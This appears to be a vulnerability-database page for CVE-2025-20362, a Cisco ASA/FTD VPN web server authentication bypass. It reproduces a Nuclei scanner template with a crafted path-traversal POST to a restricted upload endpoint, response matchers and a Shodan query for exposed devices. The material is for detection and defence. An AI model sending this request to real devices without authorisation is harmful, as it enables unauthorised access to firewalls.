Cisco Secure Firewall ASA & FTD - Authentication Bypass

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType

Unauthenticated bypass in Cisco Secure Firewall ASA and FTD VPN web server via improper input validation.

Reporter	Title	Published	Views	Family All 34
ATTACKERKB	CVE-2025-20362	25 Sep 202516:12	–	attackerkb
Circl	CVE-2025-20362	25 Sep 202516:14	–	circl
Circl	CVE-2025-20363	25 Sep 202516:03	–	circl
CISA KEV Catalog	Cisco Secure Firewall Adaptive Security Appliance (ASA) and Secure Firewall Threat Defense (FTD) Buffer Overflow Vulnerability	25 Sep 202500:00	–	cisa_kev
CISA KEV Catalog	Cisco Secure Firewall Adaptive Security (ASA) Appliance and Secure Firewall Threat Defense (FTD) Missing Authorization Vulnerability	25 Sep 202500:00	–	cisa_kev
CISA	Update: Implementation Guidance for Emergency Directive on Cisco ASA and Firepower Device Vulnerabilities	12 Nov 202512:00	–	cisa
CISA	CISA Directs Federal Agencies to Identify and Mitigate Potential Compromise of Cisco Devices	25 Sep 202512:00	–	cisa
Cisco	Continued Evolution of Persistence Mechanism Against Cisco Secure Firewall Adaptive Security Appliance and Secure Firewall Threat Defense	23 Apr 202615:00	–	cisco
Cisco	Cisco Secure Firewall Adaptive Security Appliance Software and Secure Firewall Threat Defense Software VPN Web Server Unauthorized Access Vulnerability	25 Sep 202516:00	–	cisco
Cisco	Cisco Secure Firewall Adaptive Security Appliance Software and Secure Firewall Threat Defense Software VPN Web Server Remote Code Execution Vulnerability	25 Sep 202516:00	–	cisco

Source	Link
attackerkb	www.attackerkb.com/topics/Szq5u0xgUX/cve-2025-20362/rapid7-analysis
nvd	www.nvd.nist.gov/vuln/detail/cve-2025-20362

id: CVE-2025-20362

info:
  name: Cisco Secure Firewall ASA & FTD - Authentication Bypass
  author: DhiyaneshDk,attackerkb,brendan-rsoc
  severity: medium
  description: |
    A vulnerability in the VPN web server of Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to access restricted URL endpoints that are related to remote access VPN that should otherwise be inaccessible without authentication. This vulnerability is due to improper validation of user-supplied input in HTTP(S) requests.
  impact: |
    An attacker could exploit this vulnerability by sending crafted HTTP requests to a targeted web server on a device. A successful exploit could allow the attacker to access a restricted URL without authentication.
  remediation: |
    Update to the latest available version of Cisco Secure Firewall ASA and FTD Software.
  reference:
    - https://attackerkb.com/topics/Szq5u0xgUX/cve-2025-20362/rapid7-analysis
    - https://nvd.nist.gov/vuln/detail/cve-2025-20362
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2025-20362
    epss-score: 0.46779
    epss-percentile: 0.97724
    cwe-id: CWE-862
    cpe: cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cisco
    product: adaptive-security-appliance-software
    shodan-query: html:"/+CSCOE+/logon.html"
  tags: cve,cve2025,cisco,asa,auth-bypass,kev,vkev,vuln

http:
  - raw:
      - |
        POST /+CSCOU+//../+CSCOE+/files/file_action.html?mode=upload&path=foo&server=srv&sourceurl=qaz HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;boundary=ee
        Content-Length: 10

        aabbccdd

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert('CSRF token mismatch')"
          - "Failed to upload file"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a834e348a117a4f5de4fd9cd91cf3b54d957270a9f733f54d75a47f7242f7864022006651587574b5c84d2523fe84c1e013325436a9572172f87dc8e0a6e6baf4420:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

7.5High risk

Vulners AI Score7.5

CVSS 3.16.5 - 8.6

EPSS0.46779

SSVC